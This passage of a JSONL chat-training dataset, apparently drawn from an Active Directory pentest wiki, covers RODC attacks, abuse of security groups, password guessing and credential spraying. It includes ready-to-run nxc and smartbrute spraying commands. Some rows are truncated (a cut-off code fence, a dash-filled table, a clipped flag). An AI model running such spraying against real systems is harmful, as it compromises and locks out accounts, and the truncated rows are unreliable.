passwords can be cached on any RODC, and certain accounts are explicitly denied from being cached on any RODC.\\\n> (Microsoft#credential-caching))\n\nIn case the RODC has cached the principal's credentials and thus, is able to authenticate it locally, it will issue a TGT. To do so, the RODC holds a derived version of the krbtgt key named krbtgt_XXXXX(where XXXXX is its random version number) and uses it to sign and encrypt the generated TGT. This krbtgt account's version number can also be found in its msDS-SecondaryKrbTgtNumber attribute. \n\n> [!TIP]\n> The RODC computer account has reset rights on the account krbtgt_XXXXX's password.\n\nWhen the RODC generates the TGT, it indicates in the kvno field the version number of the key used to generate the ticket. With this TGT, it is possible to request a Service Ticket (ST) against the RODC or any accessible standard writable Domain Controller (provided that the principal is listed in msDS-RevealOnDemandGroup and not listed in msDS-NeverRevealGroup).\n\n![]()\n\nRODC authentication flow{.caption}\n\n![]()\n\nRODC service access flow{.caption}", "metadata": {"corpus_index": 225, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/rodc.md", "page_title": "RODC", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe RODC - Practice in the context of penetration testing"}, {"role": "assistant", "content": "Several attacks can be performed on RODCs:\n\n* RODC golden ticket\n* Key list attack\n* Exploiting control over a RODC computer object"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe RODC - Practice in the context of penetration testing", "response": "Several attacks can be performed on RODCs:\n\n* RODC golden ticket\n* Key list attack\n* Exploiting control over a RODC computer object", "metadata": {"corpus_index": 226, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/rodc.md", "page_title": "RODC", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on RODC - Practice"}, {"role": "assistant", "content": "Several attacks can be performed on RODCs:\n\n* RODC golden ticket\n* Key list attack\n* Exploiting control over a RODC computer object"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on RODC - Practice", "response": "Several attacks can be performed on RODCs:\n\n* RODC golden ticket\n* Key list attack\n* Exploiting control over a RODC computer object", "metadata": {"corpus_index": 226, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/rodc.md", "page_title": "RODC", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Security groups - Theory work?"}, {"role": "assistant", "content": "> In the Windows Server operating system, there are several built-in accounts and security groups that are preconfigured with the appropriate rights and permissions to perform specific tasks. (Microsoft?redirectedfrom=MSDN))\n\nThere are scenarios where testers can obtain full control over members of built-in security groups. The usual targets are members of the \"Administrators\", \"Domain Admins\" or \"Entreprise Admins\" groups, however, other groups can sometimes lead to major privileges escalation."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Security groups - Theory work?", "response": "> In the Windows Server operating system, there are several built-in accounts and security groups that are preconfigured with the appropriate rights and permissions to perform specific tasks. (Microsoft?redirectedfrom=MSDN))\n\nThere are scenarios where testers can obtain full control over members of built-in security groups. The usual targets are members of the \"Administrators\", \"Domain Admins\" or \"Entreprise Admins\" groups, however, other groups can sometimes lead to major privileges escalation.", "metadata": {"corpus_index": 227, "category": "privilege_escalation", "source_file": "docs/src/ad/movement/builtins/security-groups.md", "page_title": "Security groups", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Security groups - Theory"}, {"role": "assistant", "content": "> In the Windows Server operating system, there are several built-in accounts and security groups that are preconfigured with the appropriate rights and permissions to perform specific tasks. (Microsoft?redirectedfrom=MSDN))\n\nThere are scenarios where testers can obtain full control over members of built-in security groups. The usual targets are members of the \"Administrators\", \"Domain Admins\" or \"Entreprise Admins\" groups, however, other groups can sometimes lead to major privileges escalation."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Security groups - Theory", "response": "> In the Windows Server operating system, there are several built-in accounts and security groups that are preconfigured with the appropriate rights and permissions to perform specific tasks. (Microsoft?redirectedfrom=MSDN))\n\nThere are scenarios where testers can obtain full control over members of built-in security groups. The usual targets are members of the \"Administrators\", \"Domain Admins\" or \"Entreprise Admins\" groups, however, other groups can sometimes lead to major privileges escalation.", "metadata": {"corpus_index": 227, "category": "privilege_escalation", "source_file": "docs/src/ad/movement/builtins/security-groups.md", "page_title": "Security groups", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Security groups - Practice in the context of penetration testing"}, {"role": "assistant", "content": "Below is a table summing up some groups' rights and abuse paths.\n\n| Security Group | Rights and abuses |\n| ---------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Security groups - Practice in the context of penetration testing", "response": "Below is a table summing up some groups' rights and abuse paths.\n\n| Security Group | Rights and abuses |\n| ---------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------", "metadata": {"corpus_index": 228, "category": "privilege_escalation", "source_file": "docs/src/ad/movement/builtins/security-groups.md", "page_title": "Security groups", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Security groups - Practice"}, {"role": "assistant", "content": "Below is a table summing up some groups' rights and abuse paths.\n\n| Security Group | Rights and abuses |\n| ---------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Security groups - Practice", "response": "Below is a table summing up some groups' rights and abuse paths.\n\n| Security Group | Rights and abuses |\n| ---------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------", "metadata": {"corpus_index": 228, "category": "privilege_escalation", "source_file": "docs/src/ad/movement/builtins/security-groups.md", "page_title": "Security groups", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Password guessing - Theory?"}, {"role": "assistant", "content": "There are scenarios where testers need to operate credential guessing for lateral movement, privilege escalation, or for obtaining a foothold on a system. Depending on the target user (or target system), guessing can be achieved differently.\n\nThere are three major types of credential guessing.\n\n* Common passwords: a list of common passwords (admin, backup, qwerty, ...) are tested against one or more users. This technique is to be used with care since it can cause lockouts and a lot of noise, depending on the target organization's policies.\n* Default passwords: certain technologies come with default passwords that are often left unchanged. This technique is similar to the \"common passwords\" technique, but generates less noise and has fewer chances of locking out an account.\n* Situational guessing: there are many cases where user passwords are not common and yet easily guessable when knowing the organization's vocabulary and context."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Password guessing - Theory?", "response": "There are scenarios where testers need to operate credential guessing for lateral movement, privilege escalation, or for obtaining a foothold on a system. Depending on the target user (or target system), guessing can be achieved differently.\n\nThere are three major types of credential guessing.\n\n* Common passwords: a list of common passwords (admin, backup, qwerty, ...) are tested against one or more users. This technique is to be used with care since it can cause lockouts and a lot of noise, depending on the target organization's policies.\n* Default passwords: certain technologies come with default passwords that are often left unchanged. This technique is similar to the \"common passwords\" technique, but generates less noise and has fewer chances of locking out an account.\n* Situational guessing: there are many cases where user passwords are not common and yet easily guessable when knowing the organization's vocabulary and context.", "metadata": {"corpus_index": 229, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/bruteforcing/guessing.md", "page_title": "Password guessing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Password guessing - Theory?"}, {"role": "assistant", "content": "There are scenarios where testers need to operate credential guessing for lateral movement, privilege escalation, or for obtaining a foothold on a system. Depending on the target user (or target system), guessing can be achieved differently.\n\nThere are three major types of credential guessing.\n\n* Common passwords: a list of common passwords (admin, backup, qwerty, ...) are tested against one or more users. This technique is to be used with care since it can cause lockouts and a lot of noise, depending on the target organization's policies.\n* Default passwords: certain technologies come with default passwords that are often left unchanged. This technique is similar to the \"common passwords\" technique, but generates less noise and has fewer chances of locking out an account.\n* Situational guessing: there are many cases where user passwords are not common and yet easily guessable when knowing the organization's vocabulary and context."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Password guessing - Theory?", "response": "There are scenarios where testers need to operate credential guessing for lateral movement, privilege escalation, or for obtaining a foothold on a system. Depending on the target user (or target system), guessing can be achieved differently.\n\nThere are three major types of credential guessing.\n\n* Common passwords: a list of common passwords (admin, backup, qwerty, ...) are tested against one or more users. This technique is to be used with care since it can cause lockouts and a lot of noise, depending on the target organization's policies.\n* Default passwords: certain technologies come with default passwords that are often left unchanged. This technique is similar to the \"common passwords\" technique, but generates less noise and has fewer chances of locking out an account.\n* Situational guessing: there are many cases where user passwords are not common and yet easily guessable when knowing the organization's vocabulary and context.", "metadata": {"corpus_index": 229, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/bruteforcing/guessing.md", "page_title": "Password guessing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Password guessing - Common passwords"}, {"role": "assistant", "content": "Depending on the target service, different lists of common passwords (e.g. the SecLists ones) and different tools can be used.\n\n* Hydra (C) can be used against a lot (50+) of services like FTP, HTTP, IMAP, LDAP, MS-SQL, MYSQL, RDP, SMB, SSH and many many more.\n* NetExec (Python) can be used against LDAP, WinRM, SMB, SSH and MS-SQL.\n* Kerbrute (Go) and smartbrute (Python) can be used against Kerberos pre-authentication.\n\n> [!TIP]\n> netexec has useful options for password guessing\n> \n> * --no-bruteforce: tries user1 -> password1, user2 -> password2 instead of trying every password for every user\n> * --continue-on-success: continues authentication attempts even after successes\n> \n> Smartbrute has equivalent features\n> \n> * --line-per-line: equivalent of netexec's --no-bruteforce option\n> * --stop-on-success: reversed equivalent of netexec's --continue-on-success option"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Password guessing - Common passwords", "response": "Depending on the target service, different lists of common passwords (e.g. the SecLists ones) and different tools can be used.\n\n* Hydra (C) can be used against a lot (50+) of services like FTP, HTTP, IMAP, LDAP, MS-SQL, MYSQL, RDP, SMB, SSH and many many more.\n* NetExec (Python) can be used against LDAP, WinRM, SMB, SSH and MS-SQL.\n* Kerbrute (Go) and smartbrute (Python) can be used against Kerberos pre-authentication.\n\n> [!TIP]\n> netexec has useful options for password guessing\n> \n> * --no-bruteforce: tries user1 -> password1, user2 -> password2 instead of trying every password for every user\n> * --continue-on-success: continues authentication attempts even after successes\n> \n> Smartbrute has equivalent features\n> \n> * --line-per-line: equivalent of netexec's --no-bruteforce option\n> * --stop-on-success: reversed equivalent of netexec's --continue-on-success option", "metadata": {"corpus_index": 230, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/bruteforcing/guessing.md", "page_title": "Password guessing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Password guessing - Common passwords"}, {"role": "assistant", "content": "Depending on the target service, different lists of common passwords (e.g. the SecLists ones) and different tools can be used.\n\n* Hydra (C) can be used against a lot (50+) of services like FTP, HTTP, IMAP, LDAP, MS-SQL, MYSQL, RDP, SMB, SSH and many many more.\n* NetExec (Python) can be used against LDAP, WinRM, SMB, SSH and MS-SQL.\n* Kerbrute (Go) and smartbrute (Python) can be used against Kerberos pre-authentication.\n\n> [!TIP]\n> netexec has useful options for password guessing\n> \n> * --no-bruteforce: tries user1 -> password1, user2 -> password2 instead of trying every password for every user\n> * --continue-on-success: continues authentication attempts even after successes\n> \n> Smartbrute has equivalent features\n> \n> * --line-per-line: equivalent of netexec's --no-bruteforce option\n> * --stop-on-success: reversed equivalent of netexec's --continue-on-success option"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Password guessing - Common passwords", "response": "Depending on the target service, different lists of common passwords (e.g. the SecLists ones) and different tools can be used.\n\n* Hydra (C) can be used against a lot (50+) of services like FTP, HTTP, IMAP, LDAP, MS-SQL, MYSQL, RDP, SMB, SSH and many many more.\n* NetExec (Python) can be used against LDAP, WinRM, SMB, SSH and MS-SQL.\n* Kerbrute (Go) and smartbrute (Python) can be used against Kerberos pre-authentication.\n\n> [!TIP]\n> netexec has useful options for password guessing\n> \n> * --no-bruteforce: tries user1 -> password1, user2 -> password2 instead of trying every password for every user\n> * --continue-on-success: continues authentication attempts even after successes\n> \n> Smartbrute has equivalent features\n> \n> * --line-per-line: equivalent of netexec's --no-bruteforce option\n> * --stop-on-success: reversed equivalent of netexec's --continue-on-success option", "metadata": {"corpus_index": 230, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/bruteforcing/guessing.md", "page_title": "Password guessing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Password guessing - Default passwords in the context of penetration testing"}, {"role": "assistant", "content": "This technique can be used with the same tools as the \"common passwords\" technique but with short and specific password lists. Depending on the number of passwords to try, the bruteforce can be done manually too.\n\nBelow are good examples of where to find default passwords\n\n* SecLists's Default Credentials Sheet (for password)\n* ihebski's DefaultCreds cheatsheet (for passwords and SSH keys)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Password guessing - Default passwords in the context of penetration testing", "response": "This technique can be used with the same tools as the \"common passwords\" technique but with short and specific password lists. Depending on the number of passwords to try, the bruteforce can be done manually too.\n\nBelow are good examples of where to find default passwords\n\n* SecLists's Default Credentials Sheet (for password)\n* ihebski's DefaultCreds cheatsheet (for passwords and SSH keys)", "metadata": {"corpus_index": 231, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/bruteforcing/guessing.md", "page_title": "Password guessing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Password guessing - Default passwords"}, {"role": "assistant", "content": "This technique can be used with the same tools as the \"common passwords\" technique but with short and specific password lists. Depending on the number of passwords to try, the bruteforce can be done manually too.\n\nBelow are good examples of where to find default passwords\n\n* SecLists's Default Credentials Sheet (for password)\n* ihebski's DefaultCreds cheatsheet (for passwords and SSH keys)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Password guessing - Default passwords", "response": "This technique can be used with the same tools as the \"common passwords\" technique but with short and specific password lists. Depending on the number of passwords to try, the bruteforce can be done manually too.\n\nBelow are good examples of where to find default passwords\n\n* SecLists's Default Credentials Sheet (for password)\n* ihebski's DefaultCreds cheatsheet (for passwords and SSH keys)", "metadata": {"corpus_index": 231, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/bruteforcing/guessing.md", "page_title": "Password guessing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Password guessing - Situational guessing in the context of penetration testing"}, {"role": "assistant", "content": "Users are known to be a weak (if not the weakest) link of security. Unaware users are known to choose passwords that are easy to remember, hence easy to guess. Below are a few examples that are found to be often used.\n\n* the username\n* the name of the company\n* the city, or state\n* the examples above with transformations (i.e. numbers and special characters before or after, capital letters, l33tspeak, and so on)\n* a combination of some of the examples above\n\nTesters can try the combinations of user/passwords with the tools mentioned in the \"common passwords\" technique.\n\n> [!TIP]\n> username-anarchy is a tool that can produce a list of usernames based on a firstname and lastname."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Password guessing - Situational guessing in the context of penetration testing", "response": "Users are known to be a weak (if not the weakest) link of security. Unaware users are known to choose passwords that are easy to remember, hence easy to guess. Below are a few examples that are found to be often used.\n\n* the username\n* the name of the company\n* the city, or state\n* the examples above with transformations (i.e. numbers and special characters before or after, capital letters, l33tspeak, and so on)\n* a combination of some of the examples above\n\nTesters can try the combinations of user/passwords with the tools mentioned in the \"common passwords\" technique.\n\n> [!TIP]\n> username-anarchy is a tool that can produce a list of usernames based on a firstname and lastname.", "metadata": {"corpus_index": 232, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/bruteforcing/guessing.md", "page_title": "Password guessing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Password guessing - Situational guessing?"}, {"role": "assistant", "content": "Users are known to be a weak (if not the weakest) link of security. Unaware users are known to choose passwords that are easy to remember, hence easy to guess. Below are a few examples that are found to be often used.\n\n* the username\n* the name of the company\n* the city, or state\n* the examples above with transformations (i.e. numbers and special characters before or after, capital letters, l33tspeak, and so on)\n* a combination of some of the examples above\n\nTesters can try the combinations of user/passwords with the tools mentioned in the \"common passwords\" technique.\n\n> [!TIP]\n> username-anarchy is a tool that can produce a list of usernames based on a firstname and lastname."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Password guessing - Situational guessing?", "response": "Users are known to be a weak (if not the weakest) link of security. Unaware users are known to choose passwords that are easy to remember, hence easy to guess. Below are a few examples that are found to be often used.\n\n* the username\n* the name of the company\n* the city, or state\n* the examples above with transformations (i.e. numbers and special characters before or after, capital letters, l33tspeak, and so on)\n* a combination of some of the examples above\n\nTesters can try the combinations of user/passwords with the tools mentioned in the \"common passwords\" technique.\n\n> [!TIP]\n> username-anarchy is a tool that can produce a list of usernames based on a firstname and lastname.", "metadata": {"corpus_index": 232, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/bruteforcing/guessing.md", "page_title": "Password guessing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Password guessing - Bruteforcing with lockout policies?"}, {"role": "assistant", "content": "Smartbrute (Python) and sprayhound (Python) can dynamically fetch the organization's users and lockout policy to only bruteforce accounts that have a few attempts left in order to avoid locking them out. This can only be done when supplying a valid Active Directory account's credentials. These tools have the ability to check if accounts have their username set as password. Finally, a great additional feature is that neo4j is supported and compromised accounts can be set as owned (useful when working with BloodHound).\n\n> [!WARNING] Locking out accounts\n> As always when bruteforcing passwords in production environments, it is advised to be extra careful. Specific rule and custom tools can be put in place to lock accounts on too many failed attempts. Few offensive tools analyse granular policies. Fewer tools (none to my knowledge) enumerate custom defensive tools configurations."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Password guessing - Bruteforcing with lockout policies?", "response": "Smartbrute (Python) and sprayhound (Python) can dynamically fetch the organization's users and lockout policy to only bruteforce accounts that have a few attempts left in order to avoid locking them out. This can only be done when supplying a valid Active Directory account's credentials. These tools have the ability to check if accounts have their username set as password. Finally, a great additional feature is that neo4j is supported and compromised accounts can be set as owned (useful when working with BloodHound).\n\n> [!WARNING] Locking out accounts\n> As always when bruteforcing passwords in production environments, it is advised to be extra careful. Specific rule and custom tools can be put in place to lock accounts on too many failed attempts. Few offensive tools analyse granular policies. Fewer tools (none to my knowledge) enumerate custom defensive tools configurations.", "metadata": {"corpus_index": 233, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/bruteforcing/guessing.md", "page_title": "Password guessing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Password guessing - Bruteforcing with lockout policies"}, {"role": "assistant", "content": "Smartbrute (Python) and sprayhound (Python) can dynamically fetch the organization's users and lockout policy to only bruteforce accounts that have a few attempts left in order to avoid locking them out. This can only be done when supplying a valid Active Directory account's credentials. These tools have the ability to check if accounts have their username set as password. Finally, a great additional feature is that neo4j is supported and compromised accounts can be set as owned (useful when working with BloodHound).\n\n> [!WARNING] Locking out accounts\n> As always when bruteforcing passwords in production environments, it is advised to be extra careful. Specific rule and custom tools can be put in place to lock accounts on too many failed attempts. Few offensive tools analyse granular policies. Fewer tools (none to my knowledge) enumerate custom defensive tools configurations."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Password guessing - Bruteforcing with lockout policies", "response": "Smartbrute (Python) and sprayhound (Python) can dynamically fetch the organization's users and lockout policy to only bruteforce accounts that have a few attempts left in order to avoid locking them out. This can only be done when supplying a valid Active Directory account's credentials. These tools have the ability to check if accounts have their username set as password. Finally, a great additional feature is that neo4j is supported and compromised accounts can be set as owned (useful when working with BloodHound).\n\n> [!WARNING] Locking out accounts\n> As always when bruteforcing passwords in production environments, it is advised to be extra careful. Specific rule and custom tools can be put in place to lock accounts on too many failed attempts. Few offensive tools analyse granular policies. Fewer tools (none to my knowledge) enumerate custom defensive tools configurations.", "metadata": {"corpus_index": 233, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/bruteforcing/guessing.md", "page_title": "Password guessing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Spraying"}, {"role": "assistant", "content": "Credential spraying is a technique that attackers use to try a few passwords (or keys) against a set of usernames instead of a single one. This technique is just credential guessing but \"sprayed\" (i.e. against multiple accounts) and tools that can do credential guessing can usually do spraying.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Spraying", "response": "Credential spraying is a technique that attackers use to try a few passwords (or keys) against a set of usernames instead of a single one. This technique is just credential guessing but \"sprayed\" (i.e. against multiple accounts) and tools that can do credential guessing can usually do spraying.\n\n```bash", "metadata": {"corpus_index": 234, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/bruteforcing/spraying.md", "page_title": "Spraying", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Spraying?"}, {"role": "assistant", "content": "Credential spraying is a technique that attackers use to try a few passwords (or keys) against a set of usernames instead of a single one. This technique is just credential guessing but \"sprayed\" (i.e. against multiple accounts) and tools that can do credential guessing can usually do spraying.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Spraying?", "response": "Credential spraying is a technique that attackers use to try a few passwords (or keys) against a set of usernames instead of a single one. This technique is just credential guessing but \"sprayed\" (i.e. against multiple accounts) and tools that can do credential guessing can usually do spraying.\n\n```bash", "metadata": {"corpus_index": 234, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/bruteforcing/spraying.md", "page_title": "Spraying", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does netexec example work?"}, {"role": "assistant", "content": "nxc smb target_ip -d domain.local -u users.txt -p \"password\" --no-bruteforce --continue-on-succes"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does netexec example work?", "response": "nxc smb target_ip -d domain.local -u users.txt -p \"password\" --no-bruteforce --continue-on-succes", "metadata": {"corpus_index": 235, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/bruteforcing/spraying.md", "page_title": "Spraying", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do netexec example"}, {"role": "assistant", "content": "nxc smb target_ip -d domain.local -u users.txt -p \"password\" --no-bruteforce --continue-on-succes"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do netexec example", "response": "nxc smb target_ip -d domain.local -u users.txt -p \"password\" --no-bruteforce --continue-on-succes", "metadata": {"corpus_index": 235, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/bruteforcing/spraying.md", "page_title": "Spraying", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain smartbrute example (dynamic user list)"}, {"role": "assistant", "content": "smartbrute smart -bp \"password\" kerberos -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --kdc-ip \"$KDC\" kerberos"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain smartbrute example (dynamic user list)", "response": "smartbrute smart -bp \"password\" kerberos -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --kdc-ip \"$KDC\" kerberos", "metadata": {"corpus_index": 236, "category": "credentials", "source_file": 